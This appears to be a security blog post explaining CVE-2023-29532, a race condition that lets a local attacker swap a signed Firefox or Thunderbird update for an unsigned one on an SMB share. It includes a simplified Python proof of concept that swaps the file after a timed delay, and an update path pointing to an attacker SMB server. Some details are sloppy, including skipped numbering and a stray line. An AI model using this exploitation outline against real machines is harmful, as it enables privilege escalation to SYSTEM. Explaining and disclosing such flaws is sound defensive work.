CVE-2023-29532 - How Local Attackers Trick the Mozilla Maintenance Service on Windows—A Deep Dive

Mozilla's Firefox and Thunderbird are hugely popular, and you might think they’ve got system updates on lockdown. But, with CVE-2023-29532, things were not as tight as they appeared—at least on Windows. In this exclusive deep dive, we’ll unpack how a crafty local attacker could bypass signature checks by exploiting how the Mozilla Maintenance Service handles updates over SMB shares.

If you’re a Windows user running Firefox < 112, Firefox ESR < 102.10, or Thunderbird < 102.10, this is a vuln you should know about.

What is CVE-2023-29532?

CVE-2023-29532 is a privilege escalation vulnerability that lets a local attacker trick the Mozilla Maintenance Service into applying an unsigned, and potentially malicious, update file. The catch? The update is sourced from an attacker-controlled SMB server. By exploiting the timing between signature validation and actual use of the update file, attackers can swap in bad code, bypassing the usual protections.

1. Setting the Stage: The Update Process

The Mozilla Maintenance Service runs with SYSTEM privileges and is responsible for applying updates to Mozilla Firefox and Thunderbird. It checks for signatures before applying any update—in theory, keeping unsigned (and thus, unsafe) files at bay.

Usually, the update file is referenced by a local path like C:\ProgramData\Mozilla\updates\update.mar. However, it’s also possible to point this path at a network share, including SMB (Server Message Block) shares.

Here's the crux of the vulnerability

- Signature Check: The Maintenance Service downloads the update file from the SMB share and checks its digital signature.
- No Effective Lock: The write-lock requested by the service to prevent the update file from being changed doesn’t actually work on SMB shares.
- Race Condition: An attacker replaces the (benign, signed) .mar update file on the SMB share with a malicious, unsigned one between the signature check and the update installation.

3. Gaining SYSTEM Privileges

Since the service runs as SYSTEM, your malicious code gains the highest level of privilege on the box. You now own the machine.

Proof of Concept: Weaponizing the Flaw

Below is a simplified version of how attackers might exploit this flaw. You’ll need local access to the target machine.

Disclaimer:  
For educational purposes only. Do not use this information to exploit or damage systems.

Attacker's SMB Server Setup

# SimplePythonSMBServer is a placeholder. In reality, you'd use tools like impacket's smbserver.py

from SimplePythonSMBServer import SMBServer

# Path to initial benign update.mar
benign_update_path = "benign_update.mar"
# Path to malicious update.mar to swap in after signature check
malicious_update_path = "malicious_update.mar"

# Start the server
server = SMBServer(share_name="updateshare", path=benign_update_path)
server.start()

Stay on the lookout; when the service requests the file and signature check is logged, do

import shutil
import time

def swap_file(smb_path, new_file):
    time.sleep(2)  # Wait until signature check presumed finished
    shutil.copyfile(new_file, smb_path)

swap_file("updateshare/update.mar", "malicious_update.mar")

Assume the attacker gets local access and edits the registry or update config

Update server: \\attacker-smb-server\updateshare\update.mar

Aftermath

When the Mozilla Maintenance Service applies the update, it runs your malicious update with SYSTEM privileges. Game over!

Official References

- Mozilla Security Advisory 2023-21
- NIST NVD Entry for CVE-2023-29532

File Locks and SMB

Windows file locks are robust locally, but don’t work reliably over SMB. The Mozilla updater asked for a write lock, expecting the .mar file to be unchangeable after the signature check. SMB ignored this, so the attacker could swap out the file at the critical moment.

Thunderbird 102.10

What should you do?  
Update immediately to a safe version.

Conclusion

CVE-2023-29532 highlights the dangers of assuming network file systems behave like local ones. If you’re on Windows, make sure you’re running the latest version of Firefox or Thunderbird. Even well-designed update services can fall to classic race conditions—especially when network protocols like SMB are involved.

Stay safe, keep your software patched, and remember: even local vulnerabilities can have massive impact.


Original References:  
- Mozilla Security Advisory MFSA 2023-21  
- NIST CVD Entry for CVE-2023-29532  
- Mozilla Bugzilla Issue  

*Only Windows is affected. This issue requires local system access—it’s not a remote exploit, but it’s still dangerous if your system is already compromised even a little.*

Timeline

Published on: 06/19/2023 10:15:00 UTC
Last modified on: 06/27/2023 08:27:00 UTC